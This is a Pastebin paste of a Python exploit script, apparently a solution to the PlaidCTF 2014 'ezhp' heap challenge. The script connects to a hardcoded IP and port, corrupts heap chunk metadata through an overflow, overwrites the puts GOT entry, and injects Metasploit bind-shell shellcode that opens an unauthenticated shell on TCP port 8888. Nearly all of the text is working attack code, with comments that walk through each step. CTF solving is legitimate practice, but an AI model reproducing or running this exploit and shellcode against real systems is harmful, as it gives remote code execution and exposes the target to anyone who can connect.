
pwn200 ezhp by Danux

  1. #Author: Danux Mitnick
  2. #Description: Pwn200 PlaidCTF 2014
  3. #Date: Apr 13th 2014
  4.  
  5. import socket, time, struct
  6.  
def sock_recv(s, n):
    """Read up to ``n`` bytes from socket ``s`` after a fixed delay, echo them, return them.

    The 0.25 s sleep is the only synchronisation with the remote service:
    it gives the server time to write its prompt before the single recv().
    There is no framing and no timeout, so a slow server can yield a partial
    read (and the following sends may then be out of step with its menu),
    and a dead server blocks here forever.  An empty return value means the
    peer closed the connection.
    """
    time.sleep(0.25)
    reply = s.recv(n)
    print(reply)
    return reply


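def DoData(s, data):
    """Send a raw note body ``data`` and return the service's reply.

    Uses sendall() instead of send(): the heap layout built below depends on
    the exact number of bytes reaching the service, and a partial write from
    send() would silently truncate the payload.  The reply is echoed by
    sock_recv() and now also returned so a caller can inspect it (the
    original discarded it; the 8096-byte read size is kept as found).
    """
    s.sendall(data)
    return sock_recv(s, 8096)

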
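def DoRun(s, n):
    """Send the integer ``n`` as one text line and return the service's reply.

    ``n`` is a menu choice, a note id or a note size, depending on where the
    service's prompt sequence currently is; the caller is responsible for
    keeping that in step.  sendall() rather than send(): the protocol is line
    based and a short write would leave the service waiting on half a line.
    """
    s.sendall('%d\n' % n)
    return sock_recv(s, 1024)

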
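# Target and the two absolute addresses the exploit depends on.  Both are
# fixed addresses in a 32-bit non-PIE binary (taken from `readelf --relocs
# ezhp`), so this only works against that exact build; a PIE build would
# need a leak first.
TARGET = ('54.81.149.239', 9174)
PUTS_GOT = 0x0804a008       # GOT entry of puts (readelf --relocs ezhp -> 0804a008 puts)
CHUNK_BUFFERS = 0x0804a060  # table of note buffer pointers ("chunk_buffers")
NOTE_SIZE = 256             # size requested for every note
OVERFLOW_SIZE = 276         # 20 bytes past a NOTE_SIZE buffer, into the next chunk header

# msfpayload linux/x86/shell_bind_tcp LPORT=8888 P  -- 78 bytes as generated.
# The port is the "\x22\xb8" (0x22b8 == 8888) on the second line.
# NOTE(review): this is an unauthenticated bind shell; once it is listening,
# anyone who can reach the target on TCP/8888 gets the shell, not just you.
SHELL_BIND_TCP_8888 = (
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
    "\x80\x5b\x5e\x52\x68\x02\x00\x22\xb8\x6a\x10\x51\x50\x89"
    "\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd"
    "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49"
    "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    "\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)


def p32(value):
    """Pack ``value`` as a little-endian 32-bit word (x86 pointer/size field)."""
    return struct.pack('<I', value)


def main(target=TARGET):
    """Run the ezhp exploit end to end against ``target`` (host, port).

    Menu choices, ids and sizes go through DoRun(); raw note bodies through
    DoData().  Steps, following the original author's comments:

      1. allocate three NOTE_SIZE notes (ids 0, 1, 2);
      2. "change" note 1 with OVERFLOW_SIZE bytes, 20 more than its buffer,
         so the tail overwrites the header of the adjacent chunk (note 2):
         two forged size fields and a forged fd/bk pair;
      3. delete note 2 -- the free path consumes the forged fd/bk, and after
         that note 1's buffer pointer is aimed at puts' GOT entry instead of
         the heap (this is what the author's comments describe; the exact
         unlink arithmetic is not visible from this script);
      4. "change" note 1 again: the first dword replaces puts@GOT with
         PUTS_GOT + 4, the address of the NOP sled and shellcode that follow
         it in the same write;
      5. print note 1 -- the service calls puts, which now jumps into the
         shellcode and starts a bind shell on TCP/8888.

    Assumptions this script cannot check: the GOT/.bss page is executable
    (no NX), otherwise step 5 crashes instead of running the shellcode; the
    binary is non-PIE so the addresses above are right.  After it finishes,
    connect to the target host on port 8888.
    """
    s = socket.socket()
    try:
        s.connect(target)
        raw_input('Attach process with gdb here')
        sock_recv(s, 1024)

        # 1. Three notes of NOTE_SIZE bytes -> ids 0, 1, 2.
        for _ in range(3):
            DoRun(s, 1)
            DoRun(s, NOTE_SIZE)

        # 2. Change note 1, declaring OVERFLOW_SIZE bytes.  The body must be
        #    exactly that long: 260 filler + 2 size fields + fd + bk.
        DoRun(s, 3)
        DoRun(s, 1)
        DoRun(s, OVERFLOW_SIZE)
        forged_sizes = p32(0xfffffffc) * 2   # two forged size fields (-4); kept as found
        overflow = ('A' * 260 + forged_sizes
                    + p32(PUTS_GOT)          # fd
                    + p32(CHUNK_BUFFERS))    # bk
        assert len(overflow) == OVERFLOW_SIZE
        DoData(s, overflow)

        # 3. Delete note 2: its corrupted fd/bk are consumed by the free path,
        #    which is what redirects note 1's buffer pointer.
        DoRun(s, 2)
        DoRun(s, 2)

        # 4. Change note 1 again.  Its pointer now lands on puts@GOT, so the
        #    first dword overwrites the GOT entry (with PUTS_GOT + 4, where
        #    the NOP sled starts) and the rest is the shellcode itself.
        DoRun(s, 3)
        DoRun(s, 1)
        DoRun(s, NOTE_SIZE)
        payload = p32(PUTS_GOT + 4) + '\x90' * 10 + SHELL_BIND_TCP_8888
        assert len(payload) <= NOTE_SIZE
        DoData(s, payload)

        # 5. Print note 1: puts() -> shellcode -> bind shell on 8888.
        DoRun(s, 4)
        DoRun(s, 1)
    finally:
        s.close()


if __name__ == '__main__':
    main()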
  64. "pwn200.py" 65L, 1706C                                                                                                                                                                                                     1,4           Top
RAW Paste Data
Want to get better at Python?
Learn to code Python in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top